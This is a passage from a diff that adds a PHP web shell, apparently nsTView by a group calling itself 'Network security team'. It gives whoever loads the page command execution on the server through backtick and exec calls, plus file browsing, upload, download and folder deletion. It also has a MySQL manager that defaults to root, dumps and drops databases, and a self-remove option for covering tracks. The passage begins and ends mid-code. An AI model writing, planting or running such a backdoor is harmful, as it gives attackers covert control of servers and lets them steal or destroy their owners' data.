+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.sh311Form.sh3.value+=\" \"+ text;
+document.sh311Form.sh3.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
+if($os=="unix"){
+print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
+}
+print "</td></tr>";
+
+
+
+
+
+if($_GET['p']=="ftp"){
+print "<tr><td>";
+
+
+
+print "</td></tr></table>";
+print $copyr;
+exit;
+}
+
+
+
+
+
+
+
+
+
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh3>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
+";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>";
+print `$sh3`;
+echo "</pre>";
+}
+}
+
+if(@$_GET['sh311']=="2"){
+echo "<center>cmd<br>
+pwd:
